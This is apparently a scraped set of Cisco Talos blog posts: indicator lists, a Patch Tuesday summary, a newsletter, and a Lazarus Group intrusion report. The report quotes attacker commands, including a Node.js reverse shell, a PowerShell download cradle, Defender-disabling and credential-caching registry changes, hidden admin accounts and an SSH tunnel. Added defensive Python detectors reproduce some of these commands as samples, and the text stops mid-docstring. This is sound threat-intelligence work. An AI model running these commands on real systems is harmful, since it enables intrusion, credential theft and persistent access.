Cisco Secure Firewall (formerly Next-Generation Firewall and Firepower NGFW) appliances such as Threat Defense Virtual, Adaptive Security Appliance and Meraki MX can detect malicious activity associated with this threat.

Cisco Secure Malware Analytics (Threat Grid) identifies malicious binaries and builds protection into all Cisco Secure products.

Umbrella, Cisco's secure internet gateway (SIG), blocks users from connecting to malicious domains, IPs and URLs, whether users are on or off the corporate network. Sign up for a free trial of Umbrella here.

Cisco Secure Web Appliance (formerly Web Security Appliance) automatically blocks potentially dangerous sites and tests suspicious sites before users access them.

Additional protections with context to your specific environment and threat data are available from the Firewall Management Center.

Cisco Duo provides multi-factor authentication for users to ensure only those authorized are accessing your network.

Open-source Snort Subscriber Rule Set customers can stay up to date by downloading the latest rule pack available for purchase on Snort.org. Snort Rules 60517-60539 are available for this threat.

Orbital Queries


Cisco Secure Endpoint users can use Orbital Advanced Search to run complex OSqueries to see if their endpoints are infected with this specific threat. For specific OSqueries on this threat, click here and here.

IOCs

The IOC list is also available in Talos' Github repo here.

Malicious Documents

4aa2c783ae3d2d58f12d5e89282069533a80a7ba6f7fe6c548c6230a9601e650


LNK Files

581ed090237b314a9f5cd65076cd876c229e1d51328a24effd9c8d812eaebe6a
34bf1a232870df28809597d49a70d9b549d776e1e4beb3308ff6d169a59ecd02
78c6b489ac6cebf846aab3687bbe64801fdf924f36f312802c6bb815ed6400ba
1cb2d299508739ae85d655efd6470c7402327d799eb4b69974e2efdb9226e447
a9916af0476243e6e0dbef9c45b955959772c4d18b7d1df583623e06414e53b7
8294815c2342ff11739aff5a55c993f5dd23c6c7caff2ee770e69e88a7c4cb6a
be79d470c081975528c0736a0aa10214e10e182c8948bc4526138846512f19e7
5264e8a8571fe0ef689933b8bc2ebe46b985c9263b24ea34e306d54358380cbb
ff7e8580ce6df5d5f5a2448b4646690a6f6d66b1db37f887b451665f4115d1a2
1ec69271abd8ebd1a42ac1c2fa5cdd9373ff936dc73f246e7f77435c8fa0f84c

RAR Files

750bcec54a2e51f3409c83e2100dfb23d30391e20e1c8051c2bc695914c413e3

Infostealer

139547707f38622c67c8ce2c026bf32052edd4d344f03a0b37895b5de016641a

Malicious URLs

hxxp://a0698649.xsph[.]ru/barley/barley.xml
hxxp://a0700343.xsph[.]ru/new/preach.xml
hxxp://a0700462.xsph[.]ru/grow/guests.xml
hxxp://a0700462.xsph[.]ru/seek/lost.xml
hxxp://a0701919.xsph[.]ru/head/selling.xml
hxxp://a0701919.xsph[.]ru/predator/decimal.xml
hxxp://a0701919.xsph[.]ru/registry/prediction.xml
hxxp://a0704093.xsph[.]ru/basement/insufficient.xml
hxxp://a0704093.xsph[.]ru/bass/grudge.xml
hxxp://a0705076.xsph[.]ru/ramzeses1.html
hxxp://a0705076.xsph[.]ru/regiment.txt
hxxp://a0705269.xsph[.]ru/bars/dearest.txt
hxxp://a0705269.xsph[.]ru/instruct/deaf.txt
hxxp://a0705269.xsph[.]ru/prok/gur.html
hxxp://a0705581.xsph[.]ru/guinea/preservation.txt
hxxp://a0705880.xsph[.]ru/band/sentiment.txt
hxxp://a0705880.xsph[.]ru/based/pre.txt
hxxp://a0705880.xsph[.]ru/selection/seedling.txt
hxxp://a0706248.xsph[.]ru/reject/headlong.txt
hxxp://a0707763.xsph[.]ru/decipher/prayer.txt

Additional Payload Drop Sites

hxxp://155.138.252[.]221/get.php
hxxp://45.77.237[.]252/get.php
hxxp://motoristo[.]ru/get.php
hxxp://heato[.]ru/index.php
hxxps://<random_string>.celticso[.]ru
162[.]33[.]178[.]129
kuckuduk[.]ru
pasamart[.]ru
celticso[.]ru




Microsoft Patch Tuesday for September 2022 — Snort rules and prominent vulnerabilities

13 September 2022 at 18:01

By Jon Munshaw and Asheer Malhotra. 

Microsoft released its monthly security update Tuesday, disclosing 64 vulnerabilities across the company’s hardware and software line, a sharp decline from the record number of issues Microsoft disclosed last month. 

September's security update features five critical vulnerabilities, 10 fewer than were included in last month’s Patch Tuesday. There are two moderate-severity vulnerabilities in this release and a low-severity issue that’s already been patched as a part of a recent Google Chromium update. The remainder is considered “important.” 

The most serious vulnerability exists in several versions of Windows Server and Windows 10 that could allow an attacker to gain the ability to execute remote code (RCE) by sending a singular, specially crafted IPv6 packet to a Windows node where IPSec is enabled. CVE-2022-34718 only affects instances that have IPSec enabled. This vulnerability has a severity score of 9.8 out of 10 and is considered “more likely” to be exploited by Microsoft.

Microsoft disclosed one vulnerability that's being actively exploited in the wild — CVE-2022-37969. Microsoft's advisory states this vulnerability is already circulating in the wild and could allow an attacker to gain SYSTEM-level privileges by exploiting the Windows Common Log File System Driver. The adversary must first have access to the targeted system and then run specific code, though no user interaction is required.

CVE-2022-34721 and CVE-2022-34722 also have severity scores of 9.8, though they are “less likely” to be exploited, according to Microsoft. These are remote code execution vulnerabilities in the Windows Internet Key Exchange protocol that could be triggered if an attacker sends a specially crafted IP packet.

Two other critical vulnerabilities, CVE-2022-35805 and CVE-2022-34700, exist in on-premises instances of Microsoft Dynamics 365. An authenticated attacker could exploit these vulnerabilities to run a specially crafted trusted solution package and execute arbitrary SQL commands. The attacker could escalate their privileges further and execute commands as the database owner. 

Talos would also like to highlight five important vulnerabilities that Microsoft considers to be “more likely” to be exploited:  

  • CVE-2022-37957 — Windows Kernel Elevation of Privilege Vulnerability 
  • CVE-2022-35803 — Windows Common Log File System Driver Elevation of Privilege Vulnerability 
  • CVE-2022-37954 — DirectX Graphics Kernel Elevation of Privilege Vulnerability 
  • CVE-2022-34725 — Windows ALPC Elevation of Privilege Vulnerability 
  • CVE-2022-34729 — Windows GDI Elevation of Privilege Vulnerability 

A complete list of all the vulnerabilities Microsoft disclosed this month is available on its update page. 

In response to these vulnerability disclosures, Talos is releasing a new Snort rule set that detects attempts to exploit some of them. Please note that additional rules may be released at a future date and current rules are subject to change pending additional information. Cisco Secure Firewall customers should use the latest update to their ruleset by updating their SRU. Open-source Snort Subscriber Rule Set customers can stay up to date by downloading the latest rule pack available for purchase on Snort.org. 

The rules included in this release that protect against the exploitation of many of these vulnerabilities are 60546, 60547, 60549, 60550 and 60552 - 60554. We've also released Snort 3 rules 300266 - 300270.

Threat Source newsletter (Sept. 8, 2022) — Why there is no one-stop-shop solution for protecting passwords

8 September 2022 at 18:00


By Jon Munshaw. 

Welcome to this week’s edition of the Threat Source newsletter. 

It seems like there’s at least one major password breach every month — if not more. Most recently, there was an incident at Plex where all users had to reset their passwords.  

Many users pay for a password management service — which is something I’ve talked about a ton for Talos. But even those aren’t a one-size-fits-all solution. LastPass, one of the most popular password management services, recently suffered a breach of their own internal development environment, though as of right now, it doesn’t appear like any users’ primary passwords were compromised. 

This got me curious about how people prefer to manage their passwords, so I threw up a poll on our Twitter asking our readers how they managed their passwords. Paid password management services like LastPass and 1Password were the most popular response, followed by web browser-based managers like the ones Chrome and Safari offer. Several of the replies reminded me that there is another popular option I managed to neglect: open-source, operating system-independent solutions like KeePass. These are an appealing option because they’re free, while many of the other services I’ve mentioned charge a monthly or yearly fee, and they are cloud-based with strong encryption of the passwords they store, which is especially appealing for people jumping between operating systems or machines.  

These aren’t perfect solutions either, though, because many of these open-source solutions rely on unofficial ports to mobile operating systems to run on phones and they are a bit harder to parse for the “everyday” user. I would have more faith in my parents to download an app from 1Password and be able to figure it out than trying to use open-source software in their web browser, and they are the types of users most likely to fall victim to something like a phishing scam looking to break into these password managers.  

Web browser managers also aren’t as secure as other managed options and open the door to some serious consequences if a bad actor compromises your Google account login and then steals every other login you have.  

Unless users are ready to go back to the old-fashioned “write everything down in a notebook” solution, which also has its own set of problems, it seems like there is no perfect solution to keeping passwords safe. Instead, we need to learn from the benefits of each of these types of solutions to improve our password hygiene.  

We could all afford to mix up our passwords and use long strings with multiple types of characters like web browsers will encourage users to do. But we also need several layers of authentication to access our primary password like users need to do for paid software services.  

And even then, we still have a long way to go to encourage the “average” user and administrator about secure passwords. I recently learned that the Wi-Fi password at my wife’s health care-based office is a string of numbers so easy to guess I wouldn’t even feel bad for just typing it out here (but I won’t) — so maybe we need to clear that hurdle before we start trying to convert everyone to open-source password managers.  
  

The one big thing 


The Lazarus Group, a well-known state-sponsored threat actor, is adding to its arsenal with a new trojan Talos recently discovered called “MagicRAT.” Lazarus deployed MagicRAT in several instances after the successful exploitation of vulnerabilities in VMWare Horizon platforms. While being a relatively simple RAT capability-wise, it was built with recourse to the Qt Framework, with the sole intent of making human analysis harder, and automated detection through machine learning and heuristics less likely.  

Why do I care? 

The discovery of MagicRAT in the wild is an indication of Lazarus' motivations to rapidly build new, bespoke malware to use along with their previously known malware such as TigerRAT to target organizations worldwide. Lazarus is already a formidable threat actor that’s been incredibly active this year, including major cryptocurrency-related attacks aimed at generating money for the North Korean government and subverting international sanctions. Any new developments from this group are noteworthy for the security community at large. 

So now what? 

In the attacks we observed, Lazarus Group commonly exploited VMware vulnerabilities, so users should update any products they’re using as soon as possible. Additionally, we’ve released new Snort rules and OSqueries to detect any MagicRAT activities and block it before the attackers can get any further.  

 

Top security headlines from the week


The newest version of a well-known banking trojan on the Google Play store is masquerading as legitimate antivirus software and has already been installed on tens of thousands of devices. SharkBot, which was first discovered in February, infects Android users and then tries to initiate unwanted bank transfers by stealing users’ login information and intercepting SMS multi-factor authentication messages. The malware disguises itself as two apps: Mister Phone Cleaner, which has more than 50,000 downloads so far on the Google Play store, according to security researchers, and Kylhavy Mobile Security, which has been downloaded more than 10,000 times. Affected victims are in several different countries, including the U.S., Spain, Australia, Poland, Germany and Austria. (Bleeping Computer, Tech Monitor)

Many students are heading back to school across the U.S., which also means an increased risk of cyber attacks for those schools. Threat actors traditionally try to target the education sector during this period when schools are more susceptible to an attack and more likely to pay any ransom payments. The massive, combined school district in Los Angeles, California was hit with a ransomware attack this week, forcing more than 600,000 students and staff to reset their passwords. It’s currently unclear what information, if any, was stolen, but students could attend school as planned after the Labor Day weekend. The U.S. federal government even deployed cybersecurity-related agencies to the district to assist with the district’s recovery. (NPR, Washington Post)

Local police departments have been using a little-known location-tracking service since 2018 that can allow them to track suspects’ locations without a warrant. The software, called Fog Reveal, allows the customer to use data harvested from others’ smartphones to track the location and other activities of suspects. Law enforcement has already used it to investigate several different types of crimes, including murder investigations and potential crimes surrounding the attempted insurrection on the U.S. Capitol on Jan. 6, 2021. However, the use of the software is rarely mentioned in court documents when used as part of a criminal trial. (Associated Press, Vice Motherboard)


Can’t get enough Talos? 

Upcoming events where you can find Talos 


Virtual 

Most prevalent malware files from Talos telemetry over the past week  


MD5: a087b2e6ec57b08c0d0750c60f96a74c    
Typical Filename: AAct.exe    
Claimed Product: N/A      
Detection Name: PUA.Win.Tool.Kmsauto::1201 

SHA 256: e4973db44081591e9bff5117946defbef6041397e56164f485cf8ec57b1d8934  
MD5: 93fefc3e88ffb78abb36365fa5cf857c  
Typical Filename: Wextract  
Claimed Product: Internet Explorer  
Detection Name: PUA.Win.Trojan.Generic::85.lp.ret.sbx.tg  

MD5: 8c69830a50fb85d8a794fa46643493b2 
Typical Filename: AAct.exe 
Claimed Product: N/A  
Detection Name: PUA.Win.Dropper.Generic::1201 

MD5: f1fe671bcefd4630e5ed8b87c9283534 
Typical Filename: KMSAuto Net.exe 
Claimed Product: KMSAuto Net  
Detection Name: PUA.Win.Tool.Hackkms::1201 

MD5: 0e4c49327e3be816022a233f844a5731 
Typical Filename: aact.exe 
Claimed Product: AAct x86 
Detection Name: PUA.Win.Tool.Kmsauto::in03.talos 

Lazarus and the tale of three RATs

8 September 2022 at 12:01



By Jung soo An, Asheer Malhotra and Vitor Ventura.

  • Cisco Talos has been tracking a new campaign operated by the Lazarus APT group, attributed to North Korea by the United States government.
  • This campaign involved the exploitation of vulnerabilities in VMWare Horizon to gain an initial foothold into targeted organizations.
  • Targeted organizations include energy providers from around the world, including those headquartered in the United States, Canada and Japan.
  • The campaign is meant to infiltrate organizations around the world for establishing long term access and subsequently exfiltrating data of interest to the adversary's nation-state.
  • Talos has discovered the use of two known families of malware in these intrusions — VSingle and YamaBot.
  • Talos has also discovered the use of a recently disclosed implant we're calling "MagicRAT" in this campaign.



Introduction


Cisco Talos observed North Korean state-sponsored APT Lazarus Group conducting malicious activity between February and July 2022. Lazarus has been previously attributed to the North Korean government by the U.S. Cybersecurity and Infrastructure Security Agency (CISA). The entry vectors involve the successful exploitation of vulnerabilities in VMware products to establish initial footholds into enterprise networks, followed by the deployment of the group's custom malware implants, VSingle and YamaBot. In addition to these known malware families, we have also discovered the use of a previously unknown malware implant we're calling "MagicRAT."

This campaign was previously partially disclosed by other security firms, but our findings reveal more details about the adversary's modus operandi. We have also observed an overlap of command and control (C2) and payload-hosting infrastructure between our findings and the U.S. Cybersecurity and Infrastructure Security Agency's (CISA) June advisory that detailed continued attempts from threat actors to compromise vulnerable VMware Horizon servers.

In this research, we illustrate Lazarus Group's post-exploitation tactics, techniques and procedures (TTPs) to establish a foothold, perform initial reconnaissance, deploy bespoke malware and move laterally across infected enterprises. We also provide details about the activities performed by the attackers when the VSingle backdoor is instrumented on the infected endpoints.

In this campaign, Lazarus was primarily targeting energy companies in Canada, the U.S. and Japan. The main goal of these attacks was likely to establish long-term access into victim networks to conduct espionage operations in support of North Korean government objectives. This activity aligns with historical Lazarus intrusions targeting critical infrastructure and energy companies to establish long-term access to siphon off proprietary intellectual property.




Attribution


Cisco Talos assesses with high confidence these attacks have been conducted by the North Korean state-sponsored threat actor Lazarus Group. During our investigations, we identified three distinct RATs being employed by the threat actors, including VSingle and YamaBot, which are exclusively developed and distributed by Lazarus. The Japanese CERT (JPCERT/CC) recently published reports (VSingle, YamaBot) describing them in detail and attributing the campaigns to the Lazarus threat actor.

The TTPs used in these attacks also point to the Lazarus threat actor. The initial vector was the exploitation of the Log4j vulnerability on exposed VMware Horizon servers. Successful post-exploitation led to the download of their toolkit from web servers. The same initial vector, URL patterns and similar subsequent hands-on-keyboard activity have been described in this report from AhnLab from earlier this year. There are also overlapping IOCs between the campaign described by AhnLab and the current campaign, such as the IP address 84[.]38.133[.]145, which was used as a hosting platform for the actors' malicious tools. Although the same tactics have been applied in both attacks, the resulting malware implants deployed have been distinct from one another, indicating the wide variety of implants available at the disposal of Lazarus. Additionally, we've also observed similarities in TTPs disclosed by Kaspersky attributed to the Andariel sub-group under the Lazarus umbrella, with the critical difference being the deployment of distinct malware. While Kaspersky discovered the use of Dtrack and Maui, we've observed the use of VSingle, YamaBot and MagicRAT.

Cisco Talos acknowledges that, when analyzed individually, each piece of attribution evidence only reaches medium confidence; however, taken together in the context of the campaign and its victims, these points raise our confidence level.


Campaign


Cisco Talos has observed several attacks targeting multiple victims. In this section, we detail two specific attack instances that we assess have been the most representative of the playbooks employed by Lazarus in this campaign:

  • Victim 1: Illustrates the kill chain from exploitation to actions on objectives. This intrusion also illustrates the use of the VSingle implant.
  • Victim 2: Represents a kill chain similar to Victim 1 but in this instance, we observed the deployment of a new implant we're calling "MagicRAT" along with VSingle.


A third intrusion set worth noting here is one where we saw the use of a third bespoke implant known as YamaBot. YamaBot was recently disclosed and attributed to the Lazarus APT by the Japan Computer Emergency Response Team Coordination Center (JPCERT/CC).





Victim No. 1: VSingle and beyond


In the case of the first victim, we observed the exploitation of publicly known vulnerabilities to ultimately deploy the VSingle backdoor on infected endpoints to establish long-term access.

In this specific instance, we also observed the actual instrumentation of VSingle implants to carry out additional malicious activities on the infected systems. The flow below provides an overview of the attacker's playbook, which will be detailed in the sections ahead.





Exploitation and foothold


Cisco Talos identified the exploitation of the Log4Shell vulnerability on public-facing VMware Horizon servers as the initial attack vector [T1190]. The compromise is followed by a series of activities to establish a foothold [TA0001] on the systems before the attackers deploy additional malware and move laterally across the network. During our investigation, we discovered two different foothold payloads. In the first, the attackers abuse node.exe, which ships with VMware Horizon, to execute the one-liner Node.js script below.

 C:"Program Files"\VMware"VMware View"\Server\appblastgateway\node.exe -r net -e "sh = require('child_process').exec('cmd.exe');var client = new net.Socket();client.connect(<Port>, '<C2_IP>', function(){client.pipe(sh.stdin);sh.stdout.pipe(client);sh.stderr.pipe(client);});"

This essentially opens an interactive reverse shell that attackers could use to issue arbitrary commands on the infected entry endpoint.

In another instance, we observed the attackers exploiting vulnerabilities in VMware Horizon to launch custom PowerShell scripts on the infected endpoint via VMware's ws_ConnectionServer.exe:

powershell -exec bypass IEX (New-Object Net.WebClient).DownloadString('http://<remote_location>/<filename>.ps1')

Since VMware Horizon runs with administrator privileges, the attacker doesn't have to worry about elevating their privileges.
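
Both foothold payloads leave a distinctive process lineage: Horizon's own node.exe evaluating inline JavaScript, and ws_ConnectionServer.exe spawning a PowerShell download cradle. The following is an added example (not Talos tooling or code from the report) of checking process-creation events for exactly those two traits; the event field names mirror Sysmon's Image/ParentImage/CommandLine, and every event, path, script name and address in it is constructed.

```python
"""Process-lineage checks for the two Horizon foothold payloads described above.
Added example, not Talos tooling. Field names mirror Sysmon process-creation events
(Image, ParentImage, CommandLine); every event below is constructed."""
import re
from dataclasses import dataclass
from typing import List


@dataclass
class ProcEvent:
    image: str          # full path of the new process
    parent_image: str   # full path of its parent
    cmdline: str        # command line as logged


# Rule 1: the Node.js binary shipped under appblastgateway evaluating inline code (-e/--eval)
# that wires a socket to cmd.exe. Normal Horizon use of node.exe runs a script file instead.
NODE_INLINE = re.compile(r"(^|\s)(-e|--eval)(\s|$)")
NODE_SHELL = re.compile(r"child_process|net\.Socket|\.connect\(|cmd\.exe", re.I)

# Rule 2: Horizon's connection server spawning a PowerShell download cradle.
PS_CRADLE = re.compile(
    r"DownloadString|DownloadFile|\bIEX\b|Invoke-Expression|-exec\s+bypass|-ExecutionPolicy\s+Bypass",
    re.I,
)


def _basename(path: str) -> str:
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def check_event(ev: ProcEvent) -> List[str]:
    """Names of the rules this event trips; an empty list means nothing matched."""
    hits: List[str] = []
    image, parent = _basename(ev.image), _basename(ev.parent_image)
    if (image == "node.exe" and "vmware" in ev.image.lower()
            and NODE_INLINE.search(ev.cmdline) and NODE_SHELL.search(ev.cmdline)):
        hits.append("horizon_node_reverse_shell")
    if (parent == "ws_connectionserver.exe" and image in ("powershell.exe", "pwsh.exe")
            and PS_CRADLE.search(ev.cmdline)):
        hits.append("horizon_powershell_cradle")
    return hits


def scan(events: List[ProcEvent]) -> List[List[str]]:
    return [check_event(ev) for ev in events]


HORIZON = r"C:\Program Files\VMware\VMware View\Server"
SAMPLE_EVENTS = [
    # 1. the node.exe reverse shell from the report; 203.0.113.10:4444 is a constructed C2 address
    ProcEvent(
        image=HORIZON + r"\appblastgateway\node.exe",
        parent_image=HORIZON + r"\bin\horizon_service_placeholder.exe",  # placeholder, not a real name
        cmdline=HORIZON + r"\appblastgateway\node.exe -r net -e "
        "\"sh = require('child_process').exec('cmd.exe');var client = new net.Socket();"
        "client.connect(4444, '203.0.113.10', function(){client.pipe(sh.stdin);"
        "sh.stdout.pipe(client);sh.stderr.pipe(client);});\"",
    ),
    # 2. ws_ConnectionServer.exe launching the PowerShell cradle; the URL is constructed
    ProcEvent(
        image=r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        parent_image=HORIZON + r"\bin\ws_ConnectionServer.exe",
        cmdline="powershell -exec bypass IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/a.ps1')",
    ),
    # 3. benign: node.exe running a script file (constructed script name)
    ProcEvent(
        image=HORIZON + r"\appblastgateway\node.exe",
        parent_image=HORIZON + r"\bin\horizon_service_placeholder.exe",
        cmdline=HORIZON + r"\appblastgateway\node.exe " + HORIZON + r"\appblastgateway\absg.js",
    ),
    # 4. benign: an administrator's interactive PowerShell
    ProcEvent(
        image=r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        parent_image=r"C:\Windows\explorer.exe",
        cmdline="powershell.exe Get-Date",
    ),
]

if __name__ == "__main__":
    for ev, hits in zip(SAMPLE_EVENTS, scan(SAMPLE_EVENTS)):
        print(f"{_basename(ev.image):15} <- {_basename(ev.parent_image):35} {hits or 'clean'}")
```

Rule 1 deliberately requires both the inline-eval switch and socket/child-process vocabulary, so the Horizon service's normal script-file invocation of node.exe stays quiet; rule 2 keys on the parent rather than on PowerShell alone, since PowerShell cradles are common but one launched by ws_ConnectionServer.exe is not.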

After the interactive shell is established, the attackers perform a preliminary reconnaissance on the endpoint to get network information and directory listings [T1083], [T1590], [T1518]:

ipconfig /all
dir c:"Program Files (x86)
dir c:"Program Files


The next step is the deactivation of the Windows Defender components [T1562]. This is done through registry key changes, WMIC commands and PowerShell commands. The commands below are the full set of methods Cisco Talos observed.

powershell -exec bypass -Command Get-MpPreference
powershell.exe -ExecutionPolicy Bypass -command Set-MpPreference -DisableRealtimeMonitoring $true
reg query HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows Defender\\Real-Time Protection /s /f DisableRealtimeMonitoring


Once the antivirus on the system has been disabled using the reverse shell, the attackers deploy the actual malware implant, from a family known to be developed and operated by Lazarus called "VSingle."

The deployment consists of downloading a copy of the legitimate WinRAR utility from a remote location controlled by the attackers along with an additional payload (archive) [T1608]:

powershell -exec bypass -command (New-Object System.Net.WebClient).DownloadFile('<remote_location>\\rar.tmp', '<local_path>\\rar.exe')
powershell -exec bypass -command (New-Object System.Net.WebClient).DownloadFile('<remote_location>\\update.tmp <local_path>\\java.tmp')
<local_path>\\rar.exe e <local_path>\\java.tmp <local_path_2> -hp!no!


The archive downloaded to the infected endpoint is decompressed and contains the VSingle malware executable, which is optionally renamed and then persisted on the endpoint by creating an auto-start service.


How is VSingle used?


Our investigations led to the discovery of commands fed to the VSingle backdoor by the attackers to carry out a variety of activities such as reconnaissance, exfiltration and manual backdooring.

The actor starts by performing additional reconnaissance tasks by running the commands below [T1083], [T1590].

Command Intent
systeminfo & ipconfig /all & netstat -naop tcp & tasklist & net user & net view & arp -a System Information Discovery [T1082]
query user System Information Discovery [T1082]
whoami System Information Discovery [T1082]
dir /a %appdata%\microsoft System Information Discovery [T1082]
dir /a C:\Windows\system32\config\systemprofile\AppData\Roaming\microsoft
cmd.exe /u /c dir /a c:\users\administrator
System Information Discovery [T1082]
cmd /C pwd
cmd /C dir
cmd /C cd c:\\Users\\<username>\Download & dir
cmd /C cd c:\\Users\\<username>\Downloads & dir
cmd /C cd c:\\Users\\<username> & dir
cmd /C cd c: & dir
cmd /C tree c:\\Users
System Information Discovery [T1082]
cmd.exe /u /c time /t
cmd.exe /u /c query session
System Information Discovery [T1082]


These commands will give the operators a solid understanding of the system they are in, including the installed software, network configuration and system users, among other things. This kind of information is crucial to preparing for lateral movement activities.

The attackers also force the system to cache credentials so that it is possible to harvest them afterward [T1003/005].

reg add HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest /v UseLogonCredential /t REG_DWORD /d 1 /f


The other configuration changes made to the victim host are intended to provide the attackers with their own admin-level users [T1136].

Command Intent
cmd.exe /u /c net user <userid> <password> /add Create user
cmd.exe /u /c reg add HKLM\software\microsoft\windows nt\currentversion\winlogon\specialaccounts\userlist /v <username> /t REG_DWORD /d 0 /f Add privileges
cmd.exe /u /c net localgroup Administrators /add <username>
cmd.exe /u /c net localgroup Remote Desktop Users /add <username>
Add privileges
cmd.exe /u /c net localgroup Administrateur /add <username>
cmd.exe /u /c net localgroup Administrateurs /add <username>
Add privileges
cmd.exe /u /c reg add HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon /v AllowMultipleTSSessions /t REG_DWORD /d 1 /f System config - Allow multiple sessions
cmd.exe /u /c reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v LocalAccountTokenFilterPolicy /t REG_DWORD /d 1 /f System config - disable UAC
cmd.exe /u /c reg add HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Lsa /v LmCompatibilityLevel /t REG_DWORD /d 0 /f System config - LAN Man compatibility


These accounts could be used if the RAT is detected or removed, or even to give the actors RDP access, avoiding the use of a malicious tool altogether.
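
The registry changes in this table, the WDigest change above and the Defender policy keys touched by the AV-disabling commands are all durable, queryable state. As an added example (not code from the report), the audit below checks a registry snapshot for each of those values; the snapshot format, the key constants and the constructed rows (with "svc_update" standing in for the attacker-chosen username) are assumptions of this example.

```python
"""Registry posture audit for the settings the report shows the operators changing.
Added example, not Talos code. The snapshot format (key path, value name, DWORD) is an
assumption standing in for exported registry data; the rows below are constructed."""
from typing import Dict, Iterable, List, Tuple

Snapshot = Dict[Tuple[str, str], int]   # (normalised key path, lower-cased value name) -> DWORD


def _norm(key: str) -> str:
    return key.strip().lower().replace("hkey_local_machine", "hklm").rstrip("\\")


def load_snapshot(rows: Iterable[Tuple[str, str, int]]) -> Snapshot:
    return {(_norm(key), name.lower()): value for key, name, value in rows}


WDIGEST  = _norm(r"HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest")
USERLIST = _norm(r"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList")
WINLOGON = _norm(r"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon")
POL_SYS  = _norm(r"HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System")
LSA      = _norm(r"HKLM\SYSTEM\CurrentControlSet\Control\Lsa")
DEFENDER = _norm(r"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender")
DEF_RTP  = _norm(r"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection")


def audit(snap: Snapshot) -> List[str]:
    """One finding per weakened setting; [] means none of the watched values is set badly."""
    def get(key: str, name: str):
        return snap.get((key, name.lower()))

    findings: List[str] = []
    if get(WDIGEST, "UseLogonCredential") == 1:
        findings.append("WDigest UseLogonCredential=1: plaintext logon credentials kept in LSASS (T1003/005)")
    for (key, name), value in sorted(snap.items()):
        if key == USERLIST and value == 0:
            findings.append(f"SpecialAccounts\\UserList\\{name}=0: account '{name}' hidden from the logon screen")
    if get(WINLOGON, "AllowMultipleTSSessions") == 1:
        findings.append("Winlogon AllowMultipleTSSessions=1: concurrent terminal sessions allowed")
    if get(POL_SYS, "LocalAccountTokenFilterPolicy") == 1:
        findings.append("LocalAccountTokenFilterPolicy=1: remote UAC token filtering disabled for local admins")
    lm = get(LSA, "LmCompatibilityLevel")
    if lm is not None and lm < 3:
        findings.append(f"LmCompatibilityLevel={lm}: LM/NTLMv1 responses permitted (3 or higher enforces NTLMv2)")
    if get(DEFENDER, "DisableAntiSpyWare") == 1:
        findings.append("Windows Defender policy DisableAntiSpyWare=1 (T1562/001)")
    if get(DEF_RTP, "DisableRealtimeMonitoring") == 1:
        findings.append("Windows Defender policy DisableRealtimeMonitoring=1: real-time protection off (T1562/001)")
    return findings


# Constructed snapshot reproducing the values from the report's command tables.
SAMPLE_ROWS = [
    (r"HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest", "UseLogonCredential", 1),
    (r"HKLM\software\microsoft\windows nt\currentversion\winlogon\specialaccounts\userlist", "svc_update", 0),
    (r"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon", "AllowMultipleTSSessions", 1),
    (r"HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System", "LocalAccountTokenFilterPolicy", 1),
    (r"HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System", "EnableLUA", 1),  # benign
    (r"HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Lsa", "LmCompatibilityLevel", 0),
    (r"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender", "DisableAntiSpyWare", 1),
    (r"HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection", "DisableRealtimeMonitoring", 1),
]
CLEAN_ROWS = [
    (r"HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest", "UseLogonCredential", 0),
    (r"HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Lsa", "LmCompatibilityLevel", 5),
]

if __name__ == "__main__":
    for line in audit(load_snapshot(SAMPLE_ROWS)):
        print("[!]", line)
```

Key paths are normalised before comparison because the operators' commands mix HKLM and HKEY_LOCAL_MACHINE and vary in case, as the tables show; matching on raw strings would miss half of them.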

With VSingle in place, the attackers can access other systems with the help of two additional tools.

  • pvhost.tmp renamed to pvhost.exe, which is actually plink.exe, a utility from PuTTY that can create SSH tunnels between systems.
  • osc.tmp renamed to osc.exe, which we assess with high confidence is 3proxy. Unfortunately, Cisco Talos could not obtain a copy of the file.


These two tools working together create a proxy on the victim system which has its listening port "exported" to a port on a remote host. This mechanism allows the attacker to have a local proxy port that gives access to the victim network as if the attacker's box was on it directly.

First, the attackers start the osc.exe (3proxy) to listen on a loopback port (in this example, we chose 8118), with the command below.

C:\Windows\system32\config\systemprofile\AppData\Roaming\microsoft\osc.exe -i127.0.0.1 -p8118

This alone wouldn't help the attackers: they need port 8118 exposed on their own network so that they can connect to it. So, they created an SSH tunnel using Plink, forwarding a local port to a remote address, in this case a remote server controlled by the attackers:

C:\Windows\system32\config\systemprofile\AppData\Roaming\microsoft\pvhost.exe -N -R 18118:127.0.0.1:8118 -P [Port] -l [username] -pw [password] <Remote_IP>

The -R option makes the remote server listen on port 18118 and forward each connection to port 8118 on the victim's 127.0.0.1, where osc.exe is listening.
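
The direction of a -R forward is easy to misread, so as an added example (not code from the report) here is a small parser that turns a plink or ssh forwarding command line into a plain statement of who listens where and what gets relayed; it also handles -L and -D, which the report does not show. The relay hostname, port and credentials in the sample are constructed.

```python
"""Explains what a plink/ssh port-forwarding command line does, in the direction the
report describes (-R exposes a victim service on the attacker-side SSH server).
Added example, not Talos code; it handles -R, -L and -D specs and the plink options
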